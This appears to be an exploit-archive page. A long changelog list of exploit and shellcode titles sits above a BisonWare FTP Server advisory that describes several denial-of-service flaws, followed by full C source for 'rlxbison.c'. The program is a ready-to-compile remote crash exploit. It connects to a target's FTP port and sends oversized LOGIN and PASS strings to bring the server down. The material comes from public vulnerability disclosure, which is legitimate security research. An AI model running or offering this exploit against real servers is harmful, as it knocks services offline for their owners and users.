
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
122 lines
No EOL
3.6 KiB
C
122 lines
No EOL
3.6 KiB
C
// source: https://www.securityfocus.com/bid/271/info
|
|
|
|
Multiple vulnerabilities in the BisonWare FTP Server can cause denials of service.
|
|
|
|
The vulnerabilities are:
|
|
|
|
The server fails to close the socket created by a PASV command in multiple PASV commands are executed back to back. This can create a socket and memory shortage that will not be fixed when the client disconnects from the server.
|
|
|
|
Connecting to the server and issuing a "PORT a" command followed by several thousand carriege returns and new lines will cause the server to crash.
|
|
|
|
The are multiple buffer overflows in all commands that take arguments. For example LIST and CWD both crash the server if they are passed string longer than 1500 characters.
|
|
|
|
The USER command in conjunction with a password, each containing a string over 550 characters long, is vulnerable as well which means an attacker doesn't need to logon to the server to exploit the vulnerability.
|
|
|
|
/*
|
|
* FILE: rlxbison.c
|
|
* CODER: Conde Vampiro.
|
|
* DATE: 2/29/2000.
|
|
* ABSTRACT: Remote DoS of BISON FTP Server 3.5
|
|
*
|
|
* Compile: gcc rlxbison.c -o rlbison
|
|
*
|
|
* Roses Labs / w00w00
|
|
* http://www.roses-labs.com
|
|
* Advanced Security Research.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <sys/socket.h>
|
|
#include <string.h>
|
|
#include <netdb.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/types.h>
|
|
#include <arpa/inet.h>
|
|
#include <unistd.h>
|
|
|
|
/* Defines */
|
|
|
|
#define MAX 551
|
|
#define MAXDATA 1024
|
|
|
|
/* Global variables */
|
|
|
|
int sock;
|
|
int i;
|
|
char datacrap[MAX];
|
|
char *temp;
|
|
char tempdata[MAXDATA];
|
|
char buf[MAXDATA];
|
|
struct hostent *host;
|
|
struct sockaddr_in KillFTP;
|
|
|
|
/* Prototypes */
|
|
|
|
unsigned long resolve(char *host_name);
|
|
char *crap(int num);
|
|
|
|
/* Main */
|
|
|
|
int main(int argc, char *argv[]) {
|
|
|
|
if(argc < 2) {
|
|
printf("Usage: %s <Host>\n", argv[0]);
|
|
exit(-1);
|
|
}
|
|
KillFTP.sin_family=AF_INET;
|
|
KillFTP.sin_addr.s_addr=resolve(argv[1]);
|
|
if(!KillFTP.sin_addr.s_addr) {
|
|
printf("Host Unkown: %s\n",argv[1]);
|
|
exit(-1);
|
|
}
|
|
KillFTP.sin_port=htons(21);
|
|
sock=socket(AF_INET, SOCK_STREAM, 0);
|
|
if(sock < 0) {
|
|
printf("Error creating socket!!\n");
|
|
exit(-1);
|
|
}
|
|
if(!connect(sock,(struct sockaddr *)&KillFTP, sizeof(KillFTP))) {
|
|
printf("Roses Labs Bison FTP Xploit\n");
|
|
printf("Remote crashing code!!!\n");
|
|
recv(sock,tempdata,sizeof(tempdata),0);
|
|
sleep(1);
|
|
recv(sock,tempdata,sizeof(tempdata),0);
|
|
temp=crap(MAX);
|
|
sprintf(buf,"LOGIN %s\n",temp);
|
|
send(sock,buf,strlen(buf),0);
|
|
sprintf(buf,"PASS %s\n",temp);
|
|
send(sock,buf,strlen(buf),0);
|
|
printf("Host %s crashed!!\n",argv[1]);
|
|
exit(0);
|
|
} else {
|
|
printf("Couldn't connect to %s on port 21,\n", argv[1]);
|
|
exit(-1);
|
|
}
|
|
if(close(sock)) {
|
|
printf("Error closing socket!!\n");
|
|
exit(-1);
|
|
}
|
|
return(0);
|
|
}
|
|
|
|
/* Functions */
|
|
|
|
unsigned long resolve(char *host_name) {
|
|
struct in_addr addr;
|
|
struct hostent *host_nam;
|
|
|
|
if((addr.s_addr = inet_addr(host_name)) == -1) {
|
|
if(!(host_nam = gethostbyname(host_name))) return(0);
|
|
memcpy((char *) &addr.s_addr, host_nam->h_addr, host_nam->h_length);
|
|
}
|
|
return(addr.s_addr);
|
|
}
|
|
|
|
char *crap(int num) {
|
|
for(i=0;i<num;i++) {
|
|
datacrap[i]='X';
|
|
}
|
|
return(datacrap);
|
|
}
|
|
|
|
/* w00w00 E0F */ |